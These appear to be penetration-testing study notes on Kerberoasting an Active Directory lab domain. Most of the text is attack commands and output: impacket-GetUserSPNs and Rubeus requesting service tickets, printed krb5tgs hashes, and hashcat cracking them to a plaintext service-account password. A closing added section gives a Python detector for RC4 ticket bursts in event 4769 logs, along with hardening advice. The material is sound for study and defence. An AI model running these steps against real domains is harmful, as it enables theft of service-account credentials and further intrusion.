As with AS-REP Roasting, we can run the attack from our Linux machine if we have credentials for our own user or any other domain user; otherwise we run it from the victim Windows machine.
OUR LINUX
We use the impacket-GetUserSPNs module: give it the DC's IP and, at the end, the domain and user, then enter the password when prompted.
kali@kali:~$ sudo impacket-GetUserSPNs -request -dc-ip 172.16.48.6 relia.com/jim
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- ----------- -------- -------------------------- --------- ----------
HTTP/web04.corp.com:80 iis_service 2022-09-07 08:38:43.411468 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*iis_service$CORP.COM$corp.com/iis_service*$21b427f7d7befca7abfe9fa79ce4de60$ac1459588a99d36fb31cee7aefb03cd740e9cc6d9816806cc1ea44b147384afb551723719a6d3b960adf6b2ce4e2741f7d0ec27a87c4c8bb4e5b1bb455714d3dd52c16a4e4c242df94897994ec0087cf5cfb16c2cb64439d514241eec...
This prints the hash, which we can crack with hashcat mode 13100.
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5tgs$23$*iis_service$CORP.COM$corp.com/iis_service*$21b427f7d7befca7abfe9fa79ce4de60$ac1459588a99d36fb31cee7aefb03cd740e9cc6d9816806cc1ea44b147384afb551723719a6d3b960adf6b2ce4e2741f7d0ec27a87c4c8bb4e5b1bb455714d3dd52c16a4e4c242df94897994ec0087cf5cfb16c2cb64439d514241eec
...
a96a7e6e29aa173b401935f8f3a476cdbcca8f132e6cc8349dcc88fcd26854e334a2856c009bc76e4e24372c4db4d7f41a8be56e1b6a912c44dd259052299bac30de6a8d64f179caaa2b7ee87d5612cd5a4bb9f050ba565aa97941ccfd634b:Strawberry1
VICTIM WINDOWS
Same as AS-REP Roasting, using Rubeus
PS C:\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.1.2
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : corp.com
[*] Searching path 'LDAP://DC1.corp.com/DC=corp,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : iis_service
[*] DistinguishedName : CN=iis_service,CN=Users,DC=corp,DC=com
[*] ServicePrincipalName : HTTP/web04.corp.com:80
[*] PwdLastSet : 9/7/2022 5:38:43 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\hashes.kerberoast
The hash is written to the file "hashes.kerberoast", and we crack it with hashcat mode 13100
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5tgs$23$*iis_service$corp.com$HTTP/web04.corp.com:80@corp.com*$940ad9dcf5dd5cd8e91a86d4ba0396db$f57066a4f4f8ff5d70df39b0c98ed7948a5db08d689b92446e600b49fd502dea39a8ed3b0b766e5cd40410464263557bc0e4025bfb92d89ba5c12c26c72232905dec4d060d3c8988945419ab4a7e7adec407d22bf6871d
...
d8a2033fc64622eaef566f4740659d2e520b17bd383a47da74b54048397a4aaf06093b95322ddb81ce63694e0d1a8fa974f4df071c461b65cbb3dbcaec65478798bc909bc94:Strawberry1
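As an added example that is not part of the original notes, the defender's side of the procedure above: a small Python heuristic that flags the trace these tools leave on the domain controller. It assumes Windows Security event 4769 records exported as flat key=value lines (the sample records below are constructed), and looks for one account obtaining RC4-HMAC service tickets (etype 0x17, the `$krb5tgs$23$` type shown above) for several service accounts within a short window; service accounts moved to AES-only with long random passwords or gMSA never produce that signal.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType for RC4-HMAC; AES tickets are 0x11 / 0x12

# Constructed 4769 records (not from the original page) in a flat key=value form:
# one requester pulls RC4 service tickets for three accounts within seconds, while
# the rest is AES traffic or a single isolated RC4 ticket.
SAMPLE_4769 = [
    "2024-05-01T09:00:01 EventID=4769 TargetUserName=jim@CORP.COM ServiceName=iis_service TicketEncryptionType=0x17 IpAddress=172.16.48.50",
    "2024-05-01T09:00:02 EventID=4769 TargetUserName=jim@CORP.COM ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=172.16.48.50",
    "2024-05-01T09:00:02 EventID=4769 TargetUserName=jim@CORP.COM ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=172.16.48.50",
    "2024-05-01T09:03:10 EventID=4769 TargetUserName=alice@CORP.COM ServiceName=WEB04$ TicketEncryptionType=0x12 IpAddress=172.16.48.51",
    "2024-05-01T09:15:00 EventID=4769 TargetUserName=bob@CORP.COM ServiceName=iis_service TicketEncryptionType=0x17 IpAddress=172.16.48.52",
]

def parse_event(line):
    """Split one flat record into a dict; timestamp and encryption type are decoded."""
    ts, *fields = line.split()
    ev = dict(f.split("=", 1) for f in fields)
    ev["ts"] = datetime.fromisoformat(ts)
    ev["etype"] = int(ev["TicketEncryptionType"], 16)
    return ev

def rc4_ticket_requests(lines):
    """Events where a service ticket (not the krbtgt TGT) was issued with RC4-HMAC."""
    out = []
    for line in lines:
        ev = parse_event(line)
        if ev["EventID"] == "4769" and ev["etype"] == RC4_HMAC and ev["ServiceName"].lower() != "krbtgt":
            out.append(ev)
    return out

def find_roasting(lines, window=timedelta(minutes=5), min_services=3):
    """Map requester -> sorted service accounts for requesters that obtained RC4
    tickets for at least min_services distinct accounts inside one window.
    Tuning: lower the threshold on quiet domains, raise it where legacy RC4 is common."""
    by_user = defaultdict(list)
    for ev in rc4_ticket_requests(lines):
        by_user[ev["TargetUserName"]].append(ev)
    hits = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            names = {e["ServiceName"] for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(names) >= min_services:
                hits[user] = sorted(names)
                break
    return hits

if __name__ == "__main__":
    for user, services in find_roasting(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {user}: RC4 tickets for {services}")
```

On a real export the same logic runs over the parsed `TicketEncryptionType` and `ServiceName` fields of 4769; the RC4 filter is the important part, since every hash on this page is etype 23.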